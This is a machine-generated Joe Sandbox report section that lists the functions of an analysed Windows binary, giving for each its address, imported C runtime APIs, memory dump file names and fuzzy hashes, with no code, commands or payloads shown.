Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
Instruction ID: 8315a306a3c8d793d7c899dc97aca1ada46a9aa1e44db577660f44b6f483b9f0
Opcode Fuzzy Hash: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
Instruction Fuzzy Hash: B5118427A3B54786DD69AF11E0501FAA376AF887C0F801532D75E56790FE2CE582C360

Function 00007FF7796FD5C0 Relevance: 6.3, APIs: 4, Instructions: 273COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7796FD703
memcpy.MSVCRT ref: 00007FF7796FD722
malloc.MSVCRT ref: 00007FF7796FD7C0

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpy
String ID:
API String ID: 3800483350-0
Opcode ID: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
Instruction ID: da329fca1172fd595cf72208ebef762d84bb710d9117c29b23b707ccc0f25e60
Opcode Fuzzy Hash: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
Instruction Fuzzy Hash: 7BA1A96363BA4745EA61AF15E91027AA6B2AB49BD0F844631CF8D47791FF3CF4828350

Function 00007FF7796F64F0 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7796F65A4

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction ID: fcff5b4dd59611be795e6213b53abe25939c2e9f6c71a1f38a53afbe2be5870e
Opcode Fuzzy Hash: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction Fuzzy Hash: 6591C673A35A4787E7349E2AD15476AB7B3EB14790F408235CB5AC7B80EA2DF4418B10

Function 00007FF779710F70 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF779711024

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
Instruction ID: fa665df486756c8e9f8c9f4c1a59bb78e3a90f645dda3d7df17a17264ed51ff4
Opcode Fuzzy Hash: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
Instruction Fuzzy Hash: E391D233E7A287CBF7389E1AD540779F6B1AB987D0F448535CB5A4BB80DA2CE4418790

Function 00007FF77970F3D0 Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970F46E
realloc.MSVCRT ref: 00007FF77970F4B5
realloc.MSVCRT ref: 00007FF77970F532
realloc.MSVCRT ref: 00007FF77970F5ED

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
Instruction ID: 35ced47d497ae4fa946226d80adcdf983a4196fc4904a83c8459ad0149a1e58c
Opcode Fuzzy Hash: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
Instruction Fuzzy Hash: 587173A7A26B4683DE64DF1AE885179A3B1FB58FC0F548432DF8D477A0DF2CE4528250

Function 00007FF7797097B0 Relevance: 6.2, APIs: 4, Instructions: 163COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF7797097F3
realloc.MSVCRT ref: 00007FF779709874
realloc.MSVCRT ref: 00007FF7797098B4
realloc.MSVCRT ref: 00007FF779709943

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
Instruction ID: 49c267d0fafc13fccfac1d3f7410e47870a34effe28bfea8ee0421ea87966a73
Opcode Fuzzy Hash: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
Instruction Fuzzy Hash: 1D5193B3A26B4682DF659F16E4542ADA7B1EB98FC0F448132CB8D077A4DF3CD0568250

Function 00007FF7797099D0 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779709A09
realloc.MSVCRT ref: 00007FF779709A8A
realloc.MSVCRT ref: 00007FF779709B10
realloc.MSVCRT ref: 00007FF779709B6B

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
Instruction ID: 5209bee5eb311f7399a2d6fe77302d5f2b0439d72772a68438207be19fcc2c6e
Opcode Fuzzy Hash: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
Instruction Fuzzy Hash: 885180A3A16B8682DB259F1AE454269B7B1FB58FC4B448032CB9D07760EF2CD0568240

Function 00007FF7796FE7E0 Relevance: 6.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7796FE929

Part of subcall function 00007FF7796FEC60: malloc.MSVCRT ref: 00007FF7796FED36

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
Instruction ID: 00df974acd17e625385cbc2636c7dc0d861e472da04f97ec4f3ef55505e4429b
Opcode Fuzzy Hash: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
Instruction Fuzzy Hash: 1851C337A3BB4795DA56AF1194402BEABA7BB04780F854631DF6C4B381EF38E561C320

Function 00007FF779700720 Relevance: 6.1, APIs: 4, Instructions: 135stringCOMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779700756
malloc.MSVCRT ref: 00007FF77970076B
malloc.MSVCRT ref: 00007FF7797007FE
strlen.MSVCRT ref: 00007FF779700833

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$reallocstrlen
String ID:
API String ID: 2374275640-0
Opcode ID: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
Instruction ID: f0b4755a16210c30eb23a8664e4dc620936abcc04cf592d1d28c005e8bf7efb4
Opcode Fuzzy Hash: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
Instruction Fuzzy Hash: 2741F42362674682EB64AF25E8406A877B0FB48BD5F984531DF8C0B791DF3CD4A2C350

Function 00007FF779712F20 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF779712F8D
free.MSVCRT ref: 00007FF779713093
LeaveCriticalSection.KERNEL32 ref: 00007FF7797130C7

Strings

, xrefs: 00007FF779712F6D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: CriticalLeaveSectionfreememset
String ID:
API String ID: 1662925646-3916222277
Opcode ID: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
Instruction ID: 76a2e03fec0247b8350694164d059a93f47340e4bc435ab634fb4c4cec0e1f27
Opcode Fuzzy Hash: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
Instruction Fuzzy Hash: E041E563A76643C7EA25AF1494402BCB771EB887E4F808A31CA5F037E1DE38E596C350

Function 00007FF779708FC0 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF779708FEC
realloc.MSVCRT ref: 00007FF7797090A9
realloc.MSVCRT ref: 00007FF779709101
memcpy.MSVCRT ref: 00007FF77970911B

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID:
API String ID: 1059646398-0
Opcode ID: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
Instruction ID: b4bf082831b17b984d7d6c2931da8178be23d55e4951c5233abb43d8ebe051a9
Opcode Fuzzy Hash: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
Instruction Fuzzy Hash: EA41C5A3A26B8282EF299F15E4402ADB371EB98BC4F548630DB9D07395FF2CD591C350

Function 00007FF77970B9A0 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970B9D6
realloc.MSVCRT ref: 00007FF77970BA9E
realloc.MSVCRT ref: 00007FF77970BB07
memcpy.MSVCRT ref: 00007FF77970BB23

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID:
API String ID: 1059646398-0
Opcode ID: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
Instruction ID: dd2a78f50f6f9e50168476a7626bd67674f2367827cf05642f6c5316531c7f1f
Opcode Fuzzy Hash: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
Instruction Fuzzy Hash: EE41D2B3A26B8282DB149F09E4443A9A7B1EB48BC0F418631DF9C0B7A1EF2CD542C350

Function 00007FF779709D00 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779709D3C
realloc.MSVCRT ref: 00007FF779709DC0
realloc.MSVCRT ref: 00007FF779709E10
realloc.MSVCRT ref: 00007FF779709E94

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
Instruction ID: 703c059b30d4b2d567f9b3c73a59df7d06ab249405bf56410be59832a84f1ebe
Opcode Fuzzy Hash: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
Instruction Fuzzy Hash: CF515CB3A16B8682DB259F5AE4402A9B7B1FB58FC0B548532CB8E077A1DF3CE4518340

Function 00007FF779705B70 Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779705BAC
realloc.MSVCRT ref: 00007FF779705C30
realloc.MSVCRT ref: 00007FF779705C80
realloc.MSVCRT ref: 00007FF779705CDB

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
Instruction ID: 245f59806551b03d15c2a56bdfb6b56dbdba152276f70d90700a30ca62bf94e0
Opcode Fuzzy Hash: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
Instruction Fuzzy Hash: 2C4140B3A26B8782DB259F56E44426AB371FB58BC4F848531CB8E477A1EF3CD4418340

Function 00007FF779712060 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00007FF779712086
fputc.MSVCRT ref: 00007FF779712150

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputclocaleconv
String ID:
API String ID: 697933784-0
Opcode ID: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction ID: fa0b6931fb34c11b16d5e99f011db0d0f9121bfe1f32b606e39a586a0247e754
Opcode Fuzzy Hash: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction Fuzzy Hash: D641B763E75143C7F738AE62E48137AB2B1EB5C790F500535DB6E42BC1DA2CE58297A0

Function 00007FF77970B760 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970B7AA
realloc.MSVCRT ref: 00007FF77970B80C
memcpy.MSVCRT ref: 00007FF77970B826
realloc.MSVCRT ref: 00007FF77970B85E

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
Instruction ID: 693412f4af9dc3a3d611e5163a1a510eb41b684d47fcb5edeb325b601e1fccfc
Opcode Fuzzy Hash: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
Instruction Fuzzy Hash: 633164B3A16B4683DE25AF5AF850369A371EB58BC4F448431CB9D077A1EF3CD5818350

Function 00007FF77970DB70 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970DC32

Strings

enum, xrefs: 00007FF77970DBC8
union, xrefs: 00007FF77970DBE6
struct, xrefs: 00007FF77970DBD7

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID: enum$struct$union
API String ID: 2803490479-1076304440
Opcode ID: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
Instruction ID: ba6ee050e5010f6fdc60dc0537b83be9e646ed98773ebb77a7864310e05ab12d
Opcode Fuzzy Hash: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
Instruction Fuzzy Hash: DF31F23362AB4285E645AF09A89867A62B5EB48BD0F944536DE4D077D0EE3CE583C360

Function 00007FF77970E5F0 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970E65A
realloc.MSVCRT ref: 00007FF77970E6B3
memcpy.MSVCRT ref: 00007FF77970E6CD
realloc.MSVCRT ref: 00007FF77970E705

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

